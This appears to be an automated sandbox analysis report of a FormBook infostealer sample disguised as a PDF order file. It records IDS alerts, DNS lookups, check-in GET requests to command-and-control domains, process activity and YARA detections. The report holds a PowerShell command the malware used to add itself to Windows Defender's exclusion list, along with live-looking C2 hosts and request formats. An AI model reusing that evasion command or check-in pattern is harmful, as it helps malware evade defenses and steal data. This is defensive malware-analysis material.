2024-09-23T14:38:29.395285+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49721	3.33.130.190	80	TCP
2024-09-23T14:38:29.395285+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49721	3.33.130.190	80	TCP
2024-09-23T14:38:29.395285+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49721	3.33.130.190	80	TCP
2024-09-23T14:39:16.104025+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49716	185.53.179.90	80	TCP
2024-09-23T14:39:16.104025+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49716	185.53.179.90	80	TCP
2024-09-23T14:39:16.104025+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49716	185.53.179.90	80	TCP
2024-09-23T14:39:56.698099+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49718	162.0.209.7	80	TCP
2024-09-23T14:39:56.698099+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49718	162.0.209.7	80	TCP
2024-09-23T14:39:56.698099+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49718	162.0.209.7	80	TCP
2024-09-23T14:40:17.342637+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49719	23.227.38.74	80	TCP
2024-09-23T14:40:17.342637+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49719	23.227.38.74	80	TCP
2024-09-23T14:40:17.342637+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49719	23.227.38.74	80	TCP
2024-09-23T14:40:58.694135+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49720	154.21.81.142	80	TCP
2024-09-23T14:40:58.694135+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49720	154.21.81.142	80	TCP
2024-09-23T14:40:58.694135+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49720	154.21.81.142	80	TCP
2024-09-23T14:42:20.275189+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49722	13.248.252.114	80	TCP
2024-09-23T14:42:20.275189+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49722	13.248.252.114	80	TCP
2024-09-23T14:42:20.275189+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49722	13.248.252.114	80	TCP
2024-09-23T14:42:40.656006+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49723	35.214.167.24	80	TCP
2024-09-23T14:42:40.656006+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49723	35.214.167.24	80	TCP
2024-09-23T14:42:40.656006+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49723	35.214.167.24	80	TCP
2024-09-23T14:43:02.401051+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49724	50.87.178.238	80	TCP
2024-09-23T14:43:02.401051+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49724	50.87.178.238	80	TCP
2024-09-23T14:43:02.401051+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.5	49724	50.87.178.238	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 23, 2024 14:39:15.604041100 CEST	49716	80	192.168.2.5	185.53.179.90
Sep 23, 2024 14:39:15.608846903 CEST	80	49716	185.53.179.90	192.168.2.5
Sep 23, 2024 14:39:15.608957052 CEST	49716	80	192.168.2.5	185.53.179.90
Sep 23, 2024 14:39:15.609019041 CEST	49716	80	192.168.2.5	185.53.179.90
Sep 23, 2024 14:39:15.613787889 CEST	80	49716	185.53.179.90	192.168.2.5
Sep 23, 2024 14:39:16.098500013 CEST	49716	80	192.168.2.5	185.53.179.90
Sep 23, 2024 14:39:16.103934050 CEST	80	49716	185.53.179.90	192.168.2.5
Sep 23, 2024 14:39:16.104024887 CEST	49716	80	192.168.2.5	185.53.179.90
Sep 23, 2024 14:39:56.195775032 CEST	49718	80	192.168.2.5	162.0.209.7
Sep 23, 2024 14:39:56.200638056 CEST	80	49718	162.0.209.7	192.168.2.5
Sep 23, 2024 14:39:56.200747967 CEST	49718	80	192.168.2.5	162.0.209.7
Sep 23, 2024 14:39:56.200846910 CEST	49718	80	192.168.2.5	162.0.209.7
Sep 23, 2024 14:39:56.206127882 CEST	80	49718	162.0.209.7	192.168.2.5
Sep 23, 2024 14:39:56.692693949 CEST	49718	80	192.168.2.5	162.0.209.7
Sep 23, 2024 14:39:56.697875023 CEST	80	49718	162.0.209.7	192.168.2.5
Sep 23, 2024 14:39:56.698098898 CEST	49718	80	192.168.2.5	162.0.209.7
Sep 23, 2024 14:40:16.858856916 CEST	49719	80	192.168.2.5	23.227.38.74
Sep 23, 2024 14:40:16.863709927 CEST	80	49719	23.227.38.74	192.168.2.5
Sep 23, 2024 14:40:16.863878012 CEST	49719	80	192.168.2.5	23.227.38.74
Sep 23, 2024 14:40:16.863974094 CEST	49719	80	192.168.2.5	23.227.38.74
Sep 23, 2024 14:40:16.869157076 CEST	80	49719	23.227.38.74	192.168.2.5
Sep 23, 2024 14:40:17.324412107 CEST	80	49719	23.227.38.74	192.168.2.5
Sep 23, 2024 14:40:17.324449062 CEST	80	49719	23.227.38.74	192.168.2.5
Sep 23, 2024 14:40:17.324457884 CEST	80	49719	23.227.38.74	192.168.2.5
Sep 23, 2024 14:40:17.324471951 CEST	80	49719	23.227.38.74	192.168.2.5
Sep 23, 2024 14:40:17.324484110 CEST	80	49719	23.227.38.74	192.168.2.5
Sep 23, 2024 14:40:17.324557066 CEST	49719	80	192.168.2.5	23.227.38.74
Sep 23, 2024 14:40:17.324776888 CEST	80	49719	23.227.38.74	192.168.2.5
Sep 23, 2024 14:40:17.324840069 CEST	49719	80	192.168.2.5	23.227.38.74
Sep 23, 2024 14:40:17.342637062 CEST	49719	80	192.168.2.5	23.227.38.74
Sep 23, 2024 14:40:58.174417973 CEST	49720	80	192.168.2.5	154.21.81.142
Sep 23, 2024 14:40:58.179352045 CEST	80	49720	154.21.81.142	192.168.2.5
Sep 23, 2024 14:40:58.179536104 CEST	49720	80	192.168.2.5	154.21.81.142
Sep 23, 2024 14:40:58.179536104 CEST	49720	80	192.168.2.5	154.21.81.142
Sep 23, 2024 14:40:58.184355021 CEST	80	49720	154.21.81.142	192.168.2.5
Sep 23, 2024 14:40:58.676424980 CEST	49720	80	192.168.2.5	154.21.81.142
Sep 23, 2024 14:40:58.694067955 CEST	80	49720	154.21.81.142	192.168.2.5
Sep 23, 2024 14:40:58.694134951 CEST	49720	80	192.168.2.5	154.21.81.142

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 23, 2024 14:39:15.557739973 CEST	55220	53	192.168.2.5	1.1.1.1
Sep 23, 2024 14:39:15.603338957 CEST	53	55220	1.1.1.1	192.168.2.5
Sep 23, 2024 14:39:35.896287918 CEST	50502	53	192.168.2.5	1.1.1.1
Sep 23, 2024 14:39:35.923330069 CEST	53	50502	1.1.1.1	192.168.2.5
Sep 23, 2024 14:39:56.177295923 CEST	62647	53	192.168.2.5	1.1.1.1
Sep 23, 2024 14:39:56.194933891 CEST	53	62647	1.1.1.1	192.168.2.5
Sep 23, 2024 14:40:16.606930971 CEST	64157	53	192.168.2.5	1.1.1.1
Sep 23, 2024 14:40:16.857897043 CEST	53	64157	1.1.1.1	192.168.2.5
Sep 23, 2024 14:40:57.741286993 CEST	57285	53	192.168.2.5	1.1.1.1
Sep 23, 2024 14:40:58.170066118 CEST	53	57285	1.1.1.1	192.168.2.5
Sep 23, 2024 14:41:18.193027973 CEST	61690	53	192.168.2.5	1.1.1.1
Sep 23, 2024 14:41:18.204566956 CEST	53	61690	1.1.1.1	192.168.2.5
Sep 23, 2024 14:41:38.673626900 CEST	61176	53	192.168.2.5	1.1.1.1
Sep 23, 2024 14:41:38.685558081 CEST	53	61176	1.1.1.1	192.168.2.5
Sep 23, 2024 14:41:59.114470959 CEST	57783	53	192.168.2.5	1.1.1.1
Sep 23, 2024 14:41:59.139307022 CEST	53	57783	1.1.1.1	192.168.2.5
Sep 23, 2024 14:42:19.576968908 CEST	50860	53	192.168.2.5	1.1.1.1
Sep 23, 2024 14:42:19.759835958 CEST	53	50860	1.1.1.1	192.168.2.5
Sep 23, 2024 14:42:40.008305073 CEST	54677	53	192.168.2.5	1.1.1.1
Sep 23, 2024 14:42:40.125201941 CEST	53	54677	1.1.1.1	192.168.2.5
Sep 23, 2024 14:43:01.864563942 CEST	59339	53	192.168.2.5	1.1.1.1
Sep 23, 2024 14:43:01.902484894 CEST	53	59339	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 23, 2024 14:39:15.557739973 CEST	192.168.2.5	1.1.1.1	0xaa30	Standard query (0)	www.abandoned-houses-39863.bond	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:39:35.896287918 CEST	192.168.2.5	1.1.1.1	0xc46a	Standard query (0)	www.bigbrown999.site	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:39:56.177295923 CEST	192.168.2.5	1.1.1.1	0x199a	Standard query (0)	www.bdkasinoxox.xyz	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:40:16.606930971 CEST	192.168.2.5	1.1.1.1	0x5f55	Standard query (0)	www.day2go.net	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:40:57.741286993 CEST	192.168.2.5	1.1.1.1	0xca3d	Standard query (0)	www.qwechaotk.top	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:41:18.193027973 CEST	192.168.2.5	1.1.1.1	0x698e	Standard query (0)	www.ln2m1.shop	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:41:38.673626900 CEST	192.168.2.5	1.1.1.1	0x5c24	Standard query (0)	www.practicalfranchises.info	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:41:59.114470959 CEST	192.168.2.5	1.1.1.1	0x93de	Standard query (0)	www.yzh478c.xyz	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:42:19.576968908 CEST	192.168.2.5	1.1.1.1	0x5c5c	Standard query (0)	www.hinet.tech	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:42:40.008305073 CEST	192.168.2.5	1.1.1.1	0x1a76	Standard query (0)	www.beauty.university	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:43:01.864563942 CEST	192.168.2.5	1.1.1.1	0x79c1	Standard query (0)	www.nicoleb.tech	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 23, 2024 14:39:15.603338957 CEST	1.1.1.1	192.168.2.5	0xaa30	No error (0)	www.abandoned-houses-39863.bond		185.53.179.90	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:39:35.923330069 CEST	1.1.1.1	192.168.2.5	0xc46a	Server failure (2)	www.bigbrown999.site	none	none	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:39:56.194933891 CEST	1.1.1.1	192.168.2.5	0x199a	No error (0)	www.bdkasinoxox.xyz	bdkasinoxox.xyz		CNAME (Canonical name)	IN (0x0001)	false
Sep 23, 2024 14:39:56.194933891 CEST	1.1.1.1	192.168.2.5	0x199a	No error (0)	bdkasinoxox.xyz		162.0.209.7	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:40:16.857897043 CEST	1.1.1.1	192.168.2.5	0x5f55	No error (0)	www.day2go.net	f8f982-7.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 23, 2024 14:40:16.857897043 CEST	1.1.1.1	192.168.2.5	0x5f55	No error (0)	f8f982-7.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 23, 2024 14:40:16.857897043 CEST	1.1.1.1	192.168.2.5	0x5f55	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:40:58.170066118 CEST	1.1.1.1	192.168.2.5	0xca3d	No error (0)	www.qwechaotk.top		154.21.81.142	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:41:18.204566956 CEST	1.1.1.1	192.168.2.5	0x698e	Name error (3)	www.ln2m1.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:41:38.685558081 CEST	1.1.1.1	192.168.2.5	0x5c24	No error (0)	www.practicalfranchises.info	practicalfranchises.info		CNAME (Canonical name)	IN (0x0001)	false
Sep 23, 2024 14:41:38.685558081 CEST	1.1.1.1	192.168.2.5	0x5c24	No error (0)	practicalfranchises.info		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:41:38.685558081 CEST	1.1.1.1	192.168.2.5	0x5c24	No error (0)	practicalfranchises.info		15.197.148.33	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:41:59.139307022 CEST	1.1.1.1	192.168.2.5	0x93de	Name error (3)	www.yzh478c.xyz	none	none	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:42:19.759835958 CEST	1.1.1.1	192.168.2.5	0x5c5c	No error (0)	www.hinet.tech		13.248.252.114	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:42:19.759835958 CEST	1.1.1.1	192.168.2.5	0x5c5c	No error (0)	www.hinet.tech		99.83.138.213	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:42:40.125201941 CEST	1.1.1.1	192.168.2.5	0x1a76	No error (0)	www.beauty.university		35.214.167.24	A (IP address)	IN (0x0001)	false
Sep 23, 2024 14:43:01.902484894 CEST	1.1.1.1	192.168.2.5	0x79c1	No error (0)	www.nicoleb.tech	nicoleb.tech		CNAME (Canonical name)	IN (0x0001)	false
Sep 23, 2024 14:43:01.902484894 CEST	1.1.1.1	192.168.2.5	0x79c1	No error (0)	nicoleb.tech		50.87.178.238	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.abandoned-houses-39863.bond

www.bdkasinoxox.xyz

www.day2go.net

www.qwechaotk.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49716	185.53.179.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 23, 2024 14:39:15.609019041 CEST	180	OUT	GET /rn94/?9r9Hc=ytxTjD5hRxA&jDHh=+TOTySD/xKzI1m9iyt2YV9oe7irabqlb0FG3M+MtGGXp3TOb0Tp0F4yVfcOIeMFlF/xp HTTP/1.1 Host: www.abandoned-houses-39863.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49718	162.0.209.7	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 23, 2024 14:39:56.200846910 CEST	168	OUT	GET /rn94/?9r9Hc=ytxTjD5hRxA&jDHh=I5NiMU91ItirT7qNKaN02XXkh1pCEM2b67jBRcxD66PzibDnIUK5R57IVHBUjGxrStSp HTTP/1.1 Host: www.bdkasinoxox.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49719	23.227.38.74	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 23, 2024 14:40:16.863974094 CEST	163	OUT	GET /rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxA HTTP/1.1 Host: www.day2go.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 23, 2024 14:40:17.324412107 CEST	1236	IN	HTTP/1.1 403 Forbidden Date: Mon, 23 Sep 2024 12:40:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4514 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Mon, 23 Sep 2024 12:40:32 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2qQWrM20N5faV9aAR3kFKH%2FGBGeHmczNqtYiKvhMjHGbQ5rmgR9MKYcWyVXj5F7YZahUvFJeV%2FHpG84WbJROtIQL11zvXWElhDfufTbV0h0WAoX3uvnphllFVLoo5wo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=10.999918 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Download-Options: noopen Server: cloudflare CF-RAY: 8c7a9a33f9fa7d02-EWR Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="
Sep 23, 2024 14:40:17.324449062 CEST	1236	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 Data Ascii: Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="sty
Sep 23, 2024 14:40:17.324457884 CEST	448	IN	Data Raw: 63 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 68 65 61 64 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 Data Ascii: com</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot er
Sep 23, 2024 14:40:17.324471951 CEST	1236	IN	Data Raw: 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 68 61 76 65 20 49 20 62 65 65 6e 20 62 6c 6f 63 Data Ascii: olumn"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself from online attacks. The action you just
Sep 23, 2024 14:40:17.324484110 CEST	1181	IN	Data Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 68 69 64 Data Ascii: m:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49720	154.21.81.142	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 23, 2024 14:40:58.179536104 CEST	166	OUT	GET /rn94/?jDHh=Fx60rCVvY/PfTPS+x0Yy+mO10iBB7HzlvlxbYnAbTZ/GodXDJ0QLvzTZw6Pc1HX1Gik3&9r9Hc=ytxTjD5hRxA HTTP/1.1 Host: www.qwechaotk.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Target ID:	0
Start time:	08:38:34
Start date:	23/09/2024
Path:	C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
Imagebase:	0x940000
File size:	611'840 bytes
MD5 hash:	A2082543A1C1028DD0A613A6A2AF4D21
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:38:35
Start date:	23/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
Imagebase:	0xfe0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:38:35
Start date:	23/09/2024
Path:	C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe"
Imagebase:	0x5f0000
File size:	611'840 bytes
MD5 hash:	A2082543A1C1028DD0A613A6A2AF4D21
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:38:36
Start date:	23/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:38:36
Start date:	23/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.4551128208.000000000F01C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	08:38:38
Start date:	23/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	08:38:40
Start date:	23/09/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe"
Imagebase:	0xa00000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: 